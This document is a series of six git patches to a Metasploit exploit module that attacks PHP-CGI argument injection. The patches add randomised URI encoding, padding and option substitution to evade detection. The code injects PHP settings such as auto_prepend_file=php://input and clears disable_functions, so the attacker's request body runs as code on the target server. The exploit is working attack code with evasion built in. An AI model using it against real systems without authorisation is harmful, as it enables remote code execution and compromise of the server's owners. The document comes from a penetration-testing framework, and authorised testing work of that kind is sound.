From 4909d8073a0ec576a303f3072efcb1e28213cc66 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Wed, 9 May 2012 11:01:15 -0500 Subject: [PATCH 1/6] Added lots or encoding randomness --- .../multi/http/php_cgi_arg_injection.rb | 43 +++++++++++++++---- 1 file changed, 35 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 8794c4bc56..4f4da7a91b 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - response = send_request_raw({ 'uri' => uri + '?-s'}) + response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"}) if response and response.code == 200 and response.body =~ /\\ Date: Wed, 9 May 2012 14:13:21 -0500 Subject: [PATCH 2/6] Lots of encoding randomizations for php_cgi_arg_injection --- .../multi/http/php_cgi_arg_injection.rb | 49 ++++++++++++++----- 1 file changed, 36 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 4f4da7a91b..31037b4c0c 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), + OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",5]), ], self.class) end @@ -85,19 +86,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit begin args = [ - rand_spaces(rand(50)), - create_arg("d","allow_url_include%3d#{rand_php_ini_true}"), - create_arg("d","safe_mode%3d#{rand_php_ini_false}"), - create_arg("d","suhosin.simulation%3d#{rand_php_ini_true}"), - create_arg("d","disable_functions%3d%22%22"), - create_arg("d","open_basedir%3dnone"), - create_arg("d","auto_prepend_file%3dphp://input"), + rand_spaces(datastore["URIENCODING"]), + create_arg("d","allow_url_include=#{rand_php_ini_true}"), + create_arg("d","safe_mode=#{rand_php_ini_false}"), + create_arg("d","suhosin.simulation=#{rand_php_ini_true}"), + create_arg("d",'disable_functions=""'), + create_arg("d","open_basedir=none"), + create_arg("d","auto_prepend_file=php://input"), create_arg("n") ] - qs = args.join("+") + qs = args.join() uri = "#{target_uri}?#{qs}" - + # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = " 0 + chars << 0 + end + else + if max > 0 + max.times { chars << rand(string.length)} + end + end + chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]} + string end def rand_spaces(x) @@ -141,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end def rand_dash - ["-","%2d"][rand(2)] + ["-","%2d","%2D"][rand(3)] end def rand_php_ini_false From c2c160f86cf1db1243cfed32dad9fd917439c810 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Fri, 11 May 2012 11:31:26 -0500 Subject: [PATCH 3/6] randomizes options from equivilants --- .../multi/http/php_cgi_arg_injection.rb | 66 ++++++++++++++----- 1 file changed, 48 insertions(+), 18 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 31037b4c0c..f8be97dcb8 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"}) + response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"}) if response and response.code == 200 and response.body =~ /\\ [ + "#{rand_dash}#{rand_encode("d")}", + "#{rand_dash}#{rand_dash}#{rand_encode("define")}" + ], + "-s" => [ + "#{rand_dash}#{rand_encode("s")}", + "#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}", + "#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}" + ], + "-T" => [ + "#{rand_dash}#{rand_encode("T")}", + "#{rand_dash}#{rand_dash}#{rand_encode("timing")}" + ], + "-n" => [ + "#{rand_dash}#{rand_encode("n")}", + "#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}" + ] + } + + equivs = opt_equivs[opt] + equivs ? equivs[rand(opt_equivs[opt].length)] : opt + + end + def rand_encode(string, max = string.length) + # Randomly URI encode characters from string, up to max times. chars = []; + if max > datastore["URIENCODING"] then max = datastore["URIENCODING"] end if string.length == 1 if rand(2) > 0 chars << 0 @@ -151,20 +181,20 @@ class Metasploit3 < Msf::Exploit::Remote string end - def rand_spaces(x) + def rand_spaces(num = datastore["URIENCODING"]) ret = '' - x.times { + num.times { ret << rand_space } ret end def rand_space - ["%20","%09","+"][rand(3)] + datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+" end def rand_dash - ["-","%2d","%2D"][rand(3)] + datastore["URIENCODING"] > 0 ? ["-","%2d","%2D"][rand(3)] : "-" end def rand_php_ini_false From 12a28bd519869922e0af7677791ce90346b372ca Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Tue, 12 Jun 2012 14:59:06 -0500 Subject: [PATCH 4/6] Fixed ruby 1.9 String Indexing issue, using Rex::Text.uri_encode --- modules/exploits/multi/http/php_cgi_arg_injection.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index f8be97dcb8..d0d1ce0803 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote a system-defined manner" from the RFC) and then passes them to the CGI binary." }, - 'Author' => [ 'egypt', 'hdm' ], + 'Author' => [ 'egypt', 'hdm', #original msf exploit + 'jjarmoc' ], #added URI encoding obfuscation 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ @@ -177,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote max.times { chars << rand(string.length)} end end - chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]} + chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")} string end From bbfe0f8f495f379cd5f797a47857177237cc82e6 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Tue, 12 Jun 2012 20:00:28 -0500 Subject: [PATCH 5/6] " is 0x22, duh. --- modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index d0d1ce0803..be36127b9e 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote if val val = rand_encode(val) val.gsub!('=','%3d') # = must always be encoded - val.gsub!('"','%2f') # " too + val.gsub!('"','%22') # " too end ret = '' From a631e1fef1a525ad8cddab43b225bf97de896620 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 13 Jun 2012 00:43:59 -0500 Subject: [PATCH 6/6] Change the default state to make it work on Metasploitable by default --- .../multi/http/php_cgi_arg_injection.rb | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index be36127b9e..0e61c04583 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), - OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",5]), + OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]), ], self.class) end @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - + def create_arg(arg, val = nil) if val - val = rand_encode(val) + val = rand_encode(val) val.gsub!('=','%3d') # = must always be encoded val.gsub!('"','%22') # " too end - + ret = '' ret << "#{rand_spaces}" ret << "#{rand_opt_equiv(arg)}" @@ -137,9 +137,10 @@ class Metasploit3 < Msf::Exploit::Remote ret << "#{val}" ret << "#{rand_space}" end - + def rand_opt_equiv(opt) - # Returns a random equivilant option from mapping at http://www.php.net/manual/en/features.commandline.options.php + # Returns a random equivilant option from mapping at + # http://www.php.net/manual/en/features.commandline.options.php opt_equivs = { "-d" => [ "#{rand_dash}#{rand_encode("d")}", @@ -159,12 +160,12 @@ class Metasploit3 < Msf::Exploit::Remote "#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}" ] } - + equivs = opt_equivs[opt] equivs ? equivs[rand(opt_equivs[opt].length)] : opt - + end - + def rand_encode(string, max = string.length) # Randomly URI encode characters from string, up to max times. chars = []; @@ -181,15 +182,15 @@ class Metasploit3 < Msf::Exploit::Remote chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")} string end - + def rand_spaces(num = datastore["URIENCODING"]) ret = '' num.times { ret << rand_space } - ret + ret end - + def rand_space datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+" end